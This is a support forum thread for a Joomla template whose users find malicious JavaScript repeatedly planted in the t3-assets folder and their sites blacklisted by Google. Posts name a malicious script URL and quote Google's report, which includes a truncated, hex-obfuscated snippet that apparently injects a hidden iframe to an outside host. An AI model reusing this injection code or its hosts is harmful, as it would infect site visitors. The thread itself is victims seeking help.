Viewing 8 posts - 1 through 8 (of 8 total)
  • Author
    Posts
  • cecet23 Friend
    #178111

    Hi,
    i’m using ja-bistro on my websites that you can find here: http://www.locandadellarco.com.
    from some days google has added my website in a blacklist because there are some malware into the t3-assets folder…

    I deleted all files into t3-assets and changed ftp password but yesterday evening I found a new suspicious .js (a javascript that contain a link here mmm2011.ppcsoft.in/ pizda.js into t3-assets folder.

    What can I do?

    Sherlock Friend
    #457358

    Hi cecet23,

    Your site seem to be infected by virus, I think you should contact your hosting manager to get more assistance 🙁

    cecet23 Friend
    #457412

    <em>@Sherlock Holmes 325313 wrote:</em><blockquote>Hi cecet23,

    Your site seem to be infected by virus, I think you should contact your hosting manager to get more assistance 🙁
    </blockquote>

    is that what I did, but my hosting manager told me that depend by some script on joomla. In fact the main problem is the folder t3-assets that is used by ja-bistro template.

    Winchester Friend
    #458623

    <em>@cecet23 325384 wrote:</em><blockquote>is that what I did, but my hosting manager told me that depend by some script on joomla. In fact the main problem is the folder t3-assets that is used by ja-bistro template.</blockquote>

    They always tell you that even if all your scripts (Joomla and extensions) are up-to-date. You should check to make sure all your extensions are updated just in case though.

    You can check here to see if any of your installed extensions are listed.
    http://feeds.joomla.org/JoomlaSecurityVulnerableExtensions

    A quick question though. Is it always in the same folder or are these files in other places too?

    Best regards,
    H. Winchester Lyon

    marcio42 Friend
    #464773

    Hello, I need help. My site yesterday joined the Google blacklist.

    Details malware

    URL: http://www.4ponto2.com.br/site_4ponto2/t3-assets/js33c0f.js
    Last checked: 19 August 2012

    When Google last tested this page once, your server returned content that directed the browser to a website infected with malware. The following is an example of inserting malicious code. We recommend checking the source code in search of this and any other unauthorized changes and consult our guidelines for cleaning your site and request a review.

    show
    1.1 to 1
    Malicious code inserted Type Occurrences

    var _0x3ba2=[“x3D”,””,”x6Cx65x6Ex67x74x68″,”x63x6F
    x6Fx6Bx69x65″,”x69x6Ex64x65x78x4Fx66″,”x3B”,”x73
    x75x62x73x74x72x69x6Ex67″,”x73x74x6Fx70x65x64″
    ,”x70x6Cx61x74x66x6Fx72x6D”,”x57x69x6Ex33x32″,”
    x61x70x70x4Ex61x6Dx65″,”x4Dx69x63x72x6Fx73x6F
    x66x74x20x49x6Ex74x65x72x6Ex65x74x20x45x78x70
    x6Cx6Fx72x65x72″,”x4Ex65x74x73x63x61x70x65″,”x3
    4x33x32x30x30x30x20x68x6Fx75x72x73″,”x67x65x74
    x48x6Fx75x72x73″,”x73x65x74x48x6Fx75x72x73″,”x
    73x74x6Fx70x65x64x3D”,”x3Bx70x61x74x68x3Dx2Fx3
    Bx65x78x70x69x72x65x73x3D”,”x74x6Fx47x4Dx54x53
    x74x72x69x6Ex67″,”x3Cx64x69x76x20x6Ex61x6Dx65
    x3Dx22x79x6Fx75x74x75x62x65x22x3Ex3Cx69x66x72
    x61x6Dx65x20x77x69x64x74x68x3Dx22x31x22x20x68
    x65x69x67x68x74x3Dx22x31x22x20x73x72x63x3Dx22
    x68x74x74x70x3Ax2Fx2Fx77x77x77x2Ex6Dx61x6Ex74
    x72x61x2Dx73x74x6Fx6Ex65x2Ex64x65x2Fx63x6Fx6E
    x74

    What can i do? :(( Thanks

    Sherlock Friend
    #464791

    Hi marcio42,

    I took a look but the file t3-assets/js33c0f.js seem could not be found, also I don’t see the google warning when visiting your site

    jan van de beek Friend
    #997845

    there all, i have the same issue on JA-MAGZ
    it seems to be that this issue is caused true J3-assets .. it gets a javascript URL which is loaded a external URL which causes this issue


    1. t3_asset
    Ninja Lead Moderator
    #998010

    Hi @jan van de beek

    You can change the setting on your site as my screenshot: http://prntscr.com/dp4ovp hope it helps

    Regards

Viewing 8 posts - 1 through 8 (of 8 total)

This topic contains 7 replies, has 6 voices, and was last updated by  Ninja Lead 7 years, 10 months ago.

We moved to new unified forum. Please post all new support queries in our New Forum